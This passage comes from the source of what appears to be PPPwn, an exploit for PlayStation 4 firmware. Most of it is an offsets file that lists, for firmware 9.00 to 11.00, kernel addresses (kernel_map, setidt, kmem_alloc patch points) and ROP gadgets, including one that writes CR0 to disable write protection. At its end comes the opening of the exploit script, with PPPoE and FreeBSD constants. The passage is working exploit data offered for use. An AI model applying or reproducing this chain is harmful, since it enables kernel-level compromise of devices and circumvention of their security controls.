0xffffffff822008e0 327 | 328 | # 0xffffffff825dc87d : pop rdi ; ret 329 | POP_RDI_RET = 0xffffffff825dc87d 330 | 331 | # 0xffffffff823882c9 : pop rsi ; ret 332 | POP_RSI_RET = 0xffffffff823882c9 333 | 334 | # 0xffffffff8232eec2 : pop rdx ; ret 335 | POP_RDX_RET = 0xffffffff8232eec2 336 | 337 | # 0xffffffff82246d0c : pop rcx ; ret 338 | POP_RCX_RET = 0xffffffff82246d0c 339 | 340 | # 0xffffffff8237cd26 : pop r8 ; pop rbp ; ret 341 | POP_R8_POP_RBP_RET = 0xffffffff8237cd26 342 | 343 | # 0xffffffff827a366f : pop r12 ; ret 344 | POP_R12_RET = 0xffffffff827a366f 345 | 346 | # 0xffffffff82202d74 : pop rax ; ret 347 | POP_RAX_RET = 0xffffffff82202d74 348 | 349 | # 0xffffffff822008df : pop rbp ; ret 350 | POP_RBP_RET = 0xffffffff822008df 351 | 352 | # 0xffffffff82bb5866 : push rsp ; pop rsi ; ret 353 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5866 354 | 355 | # 0xffffffff82444180 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 356 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82444180 357 | 358 | # 0xffffffff82b73476 : mov byte ptr [rcx], al ; ret 359 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b73476 360 | 361 | # 0xffffffff8220fbbc : mov rdi, rbx ; call r12 362 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8220fbbc 363 | 364 | # 0xffffffff8220f9f7 : mov rdi, r14 ; call r12 365 | MOV_RDI_R14_CALL_R12 = 0xffffffff8220f9f7 366 | 367 | # 0xffffffff8253628e : mov rsi, rbx ; call rax 368 | MOV_RSI_RBX_CALL_RAX = 0xffffffff8253628e 369 | 370 | # 0xffffffff825bb768 : mov r14, rax ; call r8 371 | MOV_R14_RAX_CALL_R8 = 0xffffffff825bb768 372 | 373 | # 0xffffffff82cb68da : add rdi, rcx ; ret 374 | ADD_RDI_RCX_RET = 0xffffffff82cb68da 375 | 376 | # 0xffffffff82346e67 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 377 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82346e67 378 | 379 | # 0xffffffff82b845c7 : jmp r14 380 | JMP_R14 = 0xffffffff82b845c7 381 | 382 | # FW 9.00 383 | class OffsetsFirmware_900: 384 | PPPOE_SOFTC_LIST = 0xffffffff843ed9f8 385 | 386 | KERNEL_MAP = 0xffffffff84468d48 387 | 388 | SETIDT = 0xffffffff82512c40 389 | 390 | KMEM_ALLOC = 0xffffffff8257be70 391 | KMEM_ALLOC_PATCH1 = 0xffffffff8257bf3c 392 | KMEM_ALLOC_PATCH2 = 0xffffffff8257bf44 393 | 394 | MEMCPY = 0xffffffff824714b0 395 | 396 | # 0xffffffff823fb949 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 397 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949 398 | 399 | SECOND_GADGET_OFF = 0x3d 400 | 401 | # 0xffffffff82996603 : jmp qword ptr [rsi + 0x3d] 402 | FIRST_GADGET = 0xffffffff82996603 403 | 404 | # 0xffffffff82c76646 : push rbp ; jmp qword ptr [rsi] 405 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c76646 406 | 407 | # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 408 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151 409 | 410 | # 0xffffffff82941e46 : lea rsp, [rsi + 0x20] ; repz ret 411 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82941e46 412 | 413 | # 0xffffffff826c52aa : add rsp, 0x28 ; pop rbp ; ret 414 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826c52aa 415 | 416 | # 0xffffffff8251b08f : add rsp, 0xb0 ; pop rbp ; ret 417 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251b08f 418 | 419 | # 0xffffffff822008e0 : ret 420 | RET = 0xffffffff822008e0 421 | 422 | # 0xffffffff822391a8 : pop rdi ; ret 423 | POP_RDI_RET = 0xffffffff822391a8 424 | 425 | # 0xffffffff822aad39 : pop rsi ; ret 426 | POP_RSI_RET = 0xffffffff822aad39 427 | 428 | # 0xffffffff82322eba : pop rdx ; ret 429 | POP_RDX_RET = 0xffffffff82322eba 430 | 431 | # 0xffffffff822445e7 : pop rcx ; ret 432 | POP_RCX_RET = 0xffffffff822445e7 433 | 434 | # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret 435 | POP_R8_POP_RBP_RET = 0xffffffff822ab4dd 436 | 437 | # 0xffffffff8279fa0f : pop r12 ; ret 438 | POP_R12_RET = 0xffffffff8279fa0f 439 | 440 | # 0xffffffff82234ec8 : pop rax ; ret 441 | POP_RAX_RET = 0xffffffff82234ec8 442 | 443 | # 0xffffffff822008df : pop rbp ; ret 444 | POP_RBP_RET = 0xffffffff822008df 445 | 446 | # 0xffffffff82bb687a : push rsp ; pop rsi ; ret 447 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb687a 448 | 449 | # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 450 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0 451 | 452 | # 0xffffffff82b7450e : mov byte ptr [rcx], al ; ret 453 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b7450e 454 | 455 | # 0xffffffff82632b9c : mov rdi, rbx ; call r12 456 | MOV_RDI_RBX_CALL_R12 = 0xffffffff82632b9c 457 | 458 | # 0xffffffff8235b387 : mov rdi, r14 ; call r12 459 | MOV_RDI_R14_CALL_R12 = 0xffffffff8235b387 460 | 461 | # 0xffffffff822e3d7e : mov rsi, rbx ; call rax 462 | MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d7e 463 | 464 | # 0xffffffff82363918 : mov r14, rax ; call r8 465 | MOV_R14_RAX_CALL_R8 = 0xffffffff82363918 466 | 467 | # 0xffffffff82cb683a : add rdi, rcx ; ret 468 | ADD_RDI_RCX_RET = 0xffffffff82cb683a 469 | 470 | # 0xffffffff82409557 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 471 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409557 472 | 473 | # 0xffffffff82b85693 : jmp r14 474 | JMP_R14 = 0xffffffff82b85693 475 | 476 | # FW 9.03 / 9.04 477 | class OffsetsFirmware_903_904: 478 | PPPOE_SOFTC_LIST = 0xffffffff843e99f8 479 | 480 | KERNEL_MAP = 0xffffffff84464d48 481 | SETIDT = 0xffffffff825128e0 482 | 483 | KMEM_ALLOC = 0xffffffff8257a070 484 | KMEM_ALLOC_PATCH1 = 0xffffffff8257a13c 485 | KMEM_ALLOC_PATCH2 = 0xffffffff8257a144 486 | 487 | MEMCPY = 0xffffffff82471130 488 | 489 | # 0xffffffff823fb679 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 490 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb679 491 | 492 | SECOND_GADGET_OFF = 0x3d 493 | 494 | # 0xffffffff829e686f : jmp qword ptr [rsi + 0x3d] 495 | FIRST_GADGET = 0xffffffff829e686f 496 | 497 | # 0xffffffff82c74566 : push rbp ; jmp qword ptr [rsi] 498 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c74566 499 | 500 | # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 501 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151 502 | 503 | # 0xffffffff8293fe06 : lea rsp, [rsi + 0x20] ; repz ret 504 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293fe06 505 | 506 | # 0xffffffff826c31aa : add rsp, 0x28 ; pop rbp ; ret 507 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826c31aa 508 | 509 | # 0xffffffff8251ad2f : add rsp, 0xb0 ; pop rbp ; ret 510 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251ad2f 511 | 512 | # 0xffffffff822008e0 : ret 513 | RET = 0xffffffff822008e0 514 | 515 | # 0xffffffff8238e75d : pop rdi ; ret 516 | POP_RDI_RET = 0xffffffff8238e75d 517 | 518 | # 0xffffffff822aad39 : pop rsi ; ret 519 | POP_RSI_RET = 0xffffffff822aad39 520 | 521 | # 0xffffffff8244cc56 : pop rdx ; ret 522 | POP_RDX_RET = 0xffffffff8244cc56 523 | 524 | # 0xffffffff822445e7 : pop rcx ; ret 525 | POP_RCX_RET = 0xffffffff822445e7 526 | 527 | # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret 528 | POP_R8_POP_RBP_RET = 0xffffffff822ab4dd 529 | 530 | # 0xffffffff8279d9cf : pop r12 ; ret 531 | POP_R12_RET = 0xffffffff8279d9cf 532 | 533 | # 0xffffffff82234ec8 : pop rax ; ret 534 | POP_RAX_RET = 0xffffffff82234ec8 535 | 536 | # 0xffffffff822008df : pop rbp ; ret 537 | POP_RBP_RET = 0xffffffff822008df 538 | 539 | # 0xffffffff82bb479a : push rsp ; pop rsi ; ret 540 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb479a 541 | 542 | # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 543 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0 544 | 545 | # 0xffffffff825386d8 : mov byte ptr [rcx], al ; ret 546 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff825386d8 547 | 548 | # 0xffffffff82630b0c : mov rdi, rbx ; call r12 549 | MOV_RDI_RBX_CALL_R12 = 0xffffffff82630b0c 550 | 551 | # 0xffffffff8235b337 : mov rdi, r14 ; call r12 552 | MOV_RDI_R14_CALL_R12 = 0xffffffff8235b337 553 | 554 | # 0xffffffff822e3d2e : mov rsi, rbx ; call rax 555 | MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d2e 556 | 557 | # 0xffffffff823638c8 : mov r14, rax ; call r8 558 | MOV_R14_RAX_CALL_R8 = 0xffffffff823638c8 559 | 560 | # 0xffffffff82cb475a : add rdi, rcx ; ret 561 | ADD_RDI_RCX_RET = 0xffffffff82cb475a 562 | 563 | # 0xffffffff82409287 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 564 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409287 565 | 566 | # 0xffffffff82b835b3 : jmp r14 567 | JMP_R14 = 0xffffffff82b835b3 568 | 569 | # FW 9.50 / 9.51 / 9.60 570 | class OffsetsFirmware_950_960: 571 | PPPOE_SOFTC_LIST = 0xffffffff8434c0a8 572 | 573 | KERNEL_MAP = 0xffffffff84347830 574 | 575 | SETIDT = 0xffffffff8254d320 576 | 577 | KMEM_ALLOC = 0xffffffff823889d0 578 | KMEM_ALLOC_PATCH1 = 0xffffffff82388a9c 579 | KMEM_ALLOC_PATCH2 = 0xffffffff82388aa4 580 | 581 | MEMCPY = 0xffffffff82401cc0 582 | 583 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff822bea79 584 | 585 | SECOND_GADGET_OFF = 0x3b 586 | 587 | # 0xffffffff822c53cd : jmp qword ptr [rsi + 0x3b] 588 | FIRST_GADGET = 0xffffffff822c53cd 589 | 590 | # 0xffffffff82c6ec06 : push rbp ; jmp qword ptr [rsi] 591 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c6ec06 592 | 593 | # 0xffffffff822bf041 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 594 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822bf041 595 | 596 | # 0xffffffff82935fc6 : lea rsp, [rsi + 0x20] ; repz ret 597 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82935fc6 598 | 599 | # 0xffffffff826adfda : add rsp, 0x28 ; pop rbp ; ret 600 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826adfda 601 | 602 | # 0xffffffff82584c1f : add rsp, 0xb0 ; pop rbp ; ret 603 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff82584c1f 604 | 605 | # 0xffffffff822008e0 : ret 606 | RET = 0xffffffff822008e0 607 | 608 | # 0xffffffff82315161 : pop rdi ; ret 609 | POP_RDI_RET = 0xffffffff82315161 610 | 611 | # 0xffffffff822dd859 : pop rsi ; ret 612 | POP_RSI_RET = 0xffffffff822dd859 613 | 614 | # 0xffffffff822cad55 : pop rdx ; ret 615 | POP_RDX_RET = 0xffffffff822cad55 616 | 617 | # 0xffffffff8222d707 : pop rcx ; ret 618 | POP_RCX_RET = 0xffffffff8222d707 619 | 620 | # 0xffffffff8220fec7 : pop r8 ; pop rbp ; ret 621 | POP_R8_POP_RBP_RET = 0xffffffff8220fec7 622 | 623 | # 0xffffffff8279f14f : pop r12 ; ret 624 | POP_R12_RET = 0xffffffff8279f14f 625 | 626 | # 0xffffffff8223a7fe : pop rax ; ret 627 | POP_RAX_RET = 0xffffffff8223a7fe 628 | 629 | # 0xffffffff822008df : pop rbp ; ret 630 | POP_RBP_RET = 0xffffffff822008df 631 | 632 | # 0xffffffff82bad912 : push rsp ; pop rsi ; ret 633 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bad912 634 | 635 | # 0xffffffff8235fea0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 636 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8235fea0 637 | 638 | # 0xffffffff824f2458 : mov byte ptr [rcx], al ; ret 639 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f2458 640 | 641 | # 0xffffffff822524dc : mov rdi, rbx ; call r12 642 | MOV_RDI_RBX_CALL_R12 = 0xffffffff822524dc 643 | 644 | # 0xffffffff82252317 : mov rdi, r14 ; call r12 645 | MOV_RDI_R14_CALL_R12 = 0xffffffff82252317 646 | 647 | # 0xffffffff824a07ae : mov rsi, rbx ; call rax 648 | MOV_RSI_RBX_CALL_RAX = 0xffffffff824a07ae 649 | 650 | # 0xffffffff82567228 : mov r14, rax ; call r8 651 | MOV_R14_RAX_CALL_R8 = 0xffffffff82567228 652 | 653 | # 0xffffffff82caedfa : add rdi, rcx ; ret 654 | ADD_RDI_RCX_RET = 0xffffffff82caedfa 655 | 656 | # 0xffffffff82333437 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 657 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82333437 658 | 659 | # 0xffffffff82b7c6e7 : jmp r14 660 | JMP_R14 = 0xffffffff82b7c6e7 661 | 662 | # FW 10.00 / 10.01 663 | class OffsetsFirmware_1000_1001: 664 | PPPOE_SOFTC_LIST = 0xffffffff8446d920 665 | 666 | KERNEL_MAP = 0xffffffff8447bef8 667 | 668 | SETIDT = 0xffffffff8227b460 669 | 670 | KMEM_ALLOC = 0xffffffff8253b040 671 | KMEM_ALLOC_PATCH1 = 0xffffffff8253b10c 672 | KMEM_ALLOC_PATCH2 = 0xffffffff8253b114 673 | 674 | MEMCPY = 0xffffffff82672d20 675 | 676 | # 0xffffffff82376089 : mov cr0 rsi ; ud2 ; mov eax 1; ret 677 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089 678 | 679 | SECOND_GADGET_OFF = 0x3b 680 | 681 | # 0xffffffff82249c5d : jmp qword ptr [rsi + 0x3b] 682 | FIRST_GADGET = 0xffffffff82249c5d 683 | 684 | # 0xffffffff82c73946 : push rbp ; jmp qword ptr [rsi] 685 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c73946 686 | 687 | # 0xffffffff82545741 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 688 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82545741 689 | 690 | # 0xffffffff8292b346 : lea rsp, [rsi + 0x20] ; repz ret 691 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8292b346 692 | 693 | # 0xffffffff826d0d0a : add rsp, 0x28 ; pop rbp ; ret 694 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826d0d0a 695 | 696 | # 0xffffffff82531c3f : add rsp, 0xb0 ; pop rbp ; ret 697 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff82531c3f 698 | 699 | # 0xffffffff822008e0 : ret 700 | RET = 0xffffffff822008e0 701 | 702 | # 0xffffffff82510c4e : pop rdi ; ret 703 | POP_RDI_RET = 0xffffffff82510c4e 704 | 705 | # 0xffffffff822983e0 : pop rsi ; ret 706 | POP_RSI_RET = 0xffffffff822983e0 707 | 708 | # 0xffffffff824029b2 : pop rdx ; ret 709 | POP_RDX_RET = 0xffffffff824029b2 710 | 711 | # 0xffffffff822983ba : pop rcx ; ret 712 | POP_RCX_RET = 0xffffffff822983ba 713 | 714 | # 0xffffffff8237dd7d : pop r8 ; pop rbp ; ret 715 | POP_R8_POP_RBP_RET = 0xffffffff8237dd7d 716 | 717 | # 0xffffffff827b32ef : pop r12 ; ret 718 | POP_R12_RET = 0xffffffff827b32ef 719 | 720 | # 0xffffffff8229974f : pop rax ; ret 721 | POP_RAX_RET = 0xffffffff8229974f 722 | 723 | # 0xffffffff822008df : pop rbp ; ret 724 | POP_RBP_RET = 0xffffffff822008df 725 | 726 | # 0xffffffff82bb3ee6 : push rsp ; pop rsi ; ret 727 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb3ee6 728 | 729 | # 0xffffffff8256bfb0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 730 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256bfb0 731 | 732 | # 0xffffffff824f0448 : mov byte ptr [rcx], al ; ret 733 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff824f0448 734 | 735 | # 0xffffffff8236bbec : mov rdi, rbx ; call r12 736 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8236bbec 737 | 738 | # 0xffffffff8236ba27 : mov rdi, r14 ; call r12 739 | MOV_RDI_R14_CALL_R12 = 0xffffffff8236ba27 740 | 741 | # 0xffffffff823f501e : mov rsi, rbx ; call rax 742 | MOV_RSI_RBX_CALL_RAX = 0xffffffff823f501e 743 | 744 | # 0xffffffff8259e638 : mov r14, rax ; call r8 745 | MOV_R14_RAX_CALL_R8 = 0xffffffff8259e638 746 | 747 | # 0xffffffff82cb3b3a : add rdi, rcx ; ret 748 | ADD_RDI_RCX_RET = 0xffffffff82cb3b3a 749 | 750 | # 0xffffffff822bfa87 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 751 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff822bfa87 752 | 753 | # 0xffffffff8280346f : jmp r14 754 | JMP_R14 = 0xffffffff8280346f 755 | 756 | # FW 10.50 / 10.70 / 10.71 757 | class OffsetsFirmware_1050_1071: 758 | PPPOE_SOFTC_LIST = 0xffffffff844514b8 759 | 760 | KERNEL_MAP = 0xffffffff844a9250 761 | 762 | SETIDT = 0xffffffff82341470 763 | 764 | KMEM_ALLOC = 0xffffffff82628960 765 | KMEM_ALLOC_PATCH1 = 0xffffffff82628a2c 766 | KMEM_ALLOC_PATCH2 = 0xffffffff82628a34 767 | 768 | MEMCPY = 0xffffffff822d7370 769 | 770 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82285f39 771 | 772 | SECOND_GADGET_OFF = 0x3b 773 | 774 | # 0xffffffff8221cb8d : jmp qword ptr [rsi + 0x3b] 775 | FIRST_GADGET = 0xffffffff8221cb8d 776 | 777 | # 0xffffffff82c74cd6 : push rbp ; jmp qword ptr [rsi] 778 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c74cd6 779 | 780 | # 0xffffffff824a4981 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 781 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824a4981 782 | 783 | # 0xffffffff82921206 : lea rsp, [rsi + 0x20] ; repz ret 784 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82921206 785 | 786 | # 0xffffffff826c493a : add rsp, 0x28 ; pop rbp ; ret 787 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826c493a 788 | 789 | # 0xffffffff822ce1af : add rsp, 0xb0 ; pop rbp ; ret 790 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff822ce1af 791 | 792 | # 0xffffffff822008e0 : ret 793 | RET = 0xffffffff822008e0 794 | 795 | # 0xffffffff8236f38f : pop rdi ; ret 796 | POP_RDI_RET = 0xffffffff8236f38f 797 | 798 | # 0xffffffff82222d59 : pop rsi ; ret 799 | POP_RSI_RET = 0xffffffff82222d59 800 | 801 | # 0xffffffff82329bb2 : pop rdx ; ret 802 | POP_RDX_RET = 0xffffffff82329bb2 803 | 804 | # 0xffffffff8225a567 : pop rcx ; ret 805 | POP_RCX_RET = 0xffffffff8225a567 806 | 807 | # 0xffffffff822234fd : pop r8 ; pop rbp ; ret 808 | POP_R8_POP_RBP_RET = 0xffffffff822234fd 809 | 810 | # 0xffffffff827aa3ef : pop r12 ; ret 811 | POP_R12_RET = 0xffffffff827aa3ef 812 | 813 | # 0xffffffff82495c08 : pop rax ; ret 814 | POP_RAX_RET = 0xffffffff82495c08 815 | 816 | # 0xffffffff822008df : pop rbp ; ret 817 | POP_RBP_RET = 0xffffffff822008df 818 | 819 | # 0xffffffff82bb5092 : push rsp ; pop rsi ; ret 820 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5092 821 | 822 | # 0xffffffff8256d4d0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 823 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff8256d4d0 824 | 825 | # 0xffffffff822a9078 : mov byte ptr [rcx], al ; ret 826 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff822a9078 827 | 828 | # 0xffffffff8229113c : mov rdi, rbx ; call r12 829 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8229113c 830 | 831 | # 0xffffffff82290f77 : mov rdi, r14 ; call r12 832 | MOV_RDI_R14_CALL_R12 = 0xffffffff82290f77 833 | 834 | # 0xffffffff8227e3ce : mov rsi, rbx ; call rax 835 | MOV_RSI_RBX_CALL_RAX = 0xffffffff8227e3ce 836 | 837 | # 0xffffffff824f95e8 : mov r14, rax ; call r8 838 | MOV_R14_RAX_CALL_R8 = 0xffffffff824f95e8 839 | 840 | # 0xffffffff82cb4eca : add rdi, rcx ; ret 841 | ADD_RDI_RCX_RET = 0xffffffff82cb4eca 842 | 843 | # 0xffffffff8220c1e7 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 844 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8220c1e7 845 | 846 | # 0xffffffff82b83a5b : jmp r14 847 | JMP_R14 = 0xffffffff82b83a5b 848 | 849 | # FW 11.00 850 | class OffsetsFirmware_1100: 851 | PPPOE_SOFTC_LIST = 0xffffffff844e2578 852 | 853 | KERNEL_MAP = 0xffffffff843ff130 854 | 855 | SETIDT = 0xffffffff8245bdb0 856 | 857 | KMEM_ALLOC = 0xffffffff82445e10 858 | KMEM_ALLOC_PATCH1 = 0xffffffff82445edc 859 | KMEM_ALLOC_PATCH2 = 0xffffffff82445ee4 860 | 861 | MEMCPY = 0xffffffff824dddf0 862 | 863 | # 0xffffffff824f1299 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 864 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299 865 | 866 | SECOND_GADGET_OFF = 0x3e 867 | 868 | # 0xffffffff82eb1f97 : jmp qword ptr [rsi + 0x3e] 869 | FIRST_GADGET = 0xffffffff82eb1f97 870 | 871 | # 0xffffffff82c75166 : push rbp ; jmp qword ptr [rsi] 872 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c75166 873 | 874 | # 0xffffffff824b90e1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 875 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824b90e1 876 | 877 | # 0xffffffff8293c8c6 : lea rsp, [rsi + 0x20] ; repz ret 878 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293c8c6 879 | 880 | # 0xffffffff826cb2da : add rsp, 0x28 ; pop rbp ; ret 881 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826cb2da 882 | 883 | # 0xffffffff824cdd5f : add rsp, 0xb0 ; pop rbp ; ret 884 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff824cdd5f 885 | 886 | # 0xffffffff822007e4 : ret 887 | RET = 0xffffffff822007e4 888 | 889 | # 0xffffffff825f38ed : pop rdi ; ret 890 | POP_RDI_RET = 0xffffffff825f38ed 891 | 892 | # 0xffffffff8224a6a9 : pop rsi ; ret 893 | POP_RSI_RET = 0xffffffff8224a6a9 894 | 895 | # 0xffffffff822a4762 : pop rdx ; ret 896 | POP_RDX_RET = 0xffffffff822a4762 897 | 898 | # 0xffffffff8221170a : pop rcx ; ret 899 | POP_RCX_RET = 0xffffffff8221170a 900 | 901 | # 0xffffffff8224ae4d : pop r8 ; pop rbp ; ret 902 | POP_R8_POP_RBP_RET = 0xffffffff8224ae4d 903 | 904 | # 0xffffffff8279faaf : pop r12 ; ret 905 | POP_R12_RET = 0xffffffff8279faaf 906 | 907 | # 0xffffffff8221172e : pop rax ; ret 908 | POP_RAX_RET = 0xffffffff8221172e 909 | 910 | # 0xffffffff822008df : pop rbp ; ret 911 | POP_RBP_RET = 0xffffffff822008df 912 | 913 | # 0xffffffff82bb5c7a : push rsp ; pop rsi ; ret 914 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5c7a 915 | 916 | # 0xffffffff823ce260 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 917 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff823ce260 918 | 919 | # 0xffffffff8236ae58 : mov byte ptr [rcx], al ; ret 920 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff8236ae58 921 | 922 | # 0xffffffff8233426c : mov rdi, rbx ; call r12 923 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8233426c 924 | 925 | # 0xffffffff823340a7 : mov rdi, r14 ; call r12 926 | MOV_RDI_R14_CALL_R12 = 0xffffffff823340a7 927 | 928 | # 0xffffffff82512dce : mov rsi, rbx ; call rax 929 | MOV_RSI_RBX_CALL_RAX = 0xffffffff82512dce 930 | 931 | # 0xffffffff82624df8 : mov r14, rax ; call r8 932 | MOV_R14_RAX_CALL_R8 = 0xffffffff82624df8 933 | 934 | # 0xffffffff82cb535a : add rdi, rcx ; ret 935 | ADD_RDI_RCX_RET = 0xffffffff82cb535a 936 | 937 | # 0xffffffff8260f297 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 938 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8260f297 939 | 940 | # 0xffffffff82b84657 : jmp r14 941 | JMP_R14 = 0xffffffff82b84657 942 | -------------------------------------------------------------------------------- /PPPwn/pppwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Copyright (C) 2024 Andy Nguyen 4 | # 5 | # This software may be modified and distributed under the terms 6 | # of the MIT license. See the LICENSE file for details. 7 | 8 | from argparse import ArgumentParser 9 | from scapy.all import * 10 | from scapy.layers.ppp import * 11 | from struct import pack, unpack 12 | from sys import exit 13 | from time import sleep 14 | from offsets import * 15 | 16 | # PPPoE constants 17 | 18 | PPPOE_TAG_HUNIQUE = 0x0103 19 | PPPOE_TAG_ACOOKIE = 0x0104 20 | 21 | PPPOE_CODE_PADI = 0x09 22 | PPPOE_CODE_PADO = 0x07 23 | PPPOE_CODE_PADR = 0x19 24 | PPPOE_CODE_PADS = 0x65 25 | PPPOE_CODE_PADT = 0xa7 26 | 27 | ETHERTYPE_PPPOEDISC = 0x8863 28 | ETHERTYPE_PPPOE = 0x8864 29 | 30 | CONF_REQ = 1 31 | CONF_ACK = 2 32 | CONF_NAK = 3 33 | CONF_REJ = 4 34 | ECHO_REQ = 9 35 | ECHO_REPLY = 10 36 | 37 | # FreeBSD constants 38 | 39 | NULL = 0 40 | 41 | PAGE_SIZE = 0x4000 42 | 43 | IDT_UD = 6 44 | SDT_SYSIGT = 14 45 | SEL_KPL = 0 46 | 47 | CR0_PE = 0x00000001 48 | CR0_MP = 0x00000002 49 | CR0_EM = 0x00000004 50 | CR0_TS = 0x00000008 51 | CR0_ET = 0x00000010 52 | CR0_NE = 0x00000020 53 | CR0_WP = 0x00010000 54 | CR0_AM = 0x00040000 55 | CR0_NW = 0x20000000 56 | CR0_CD = 0x40000000 57 | CR0_PG = 0x80000000 58 | 59 | CR0_ORI = CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_ET | CR0_TS | CR0_MP | CR0_PE 60 | 61 | VM_PROT_READ = 0x01 62 | VM_PROT_WRITE = 0x02 63 | VM_PROT_EXECUTE = 0x04 64 | 65 | VM_PROT_ALL = (VM_PROT_READ | 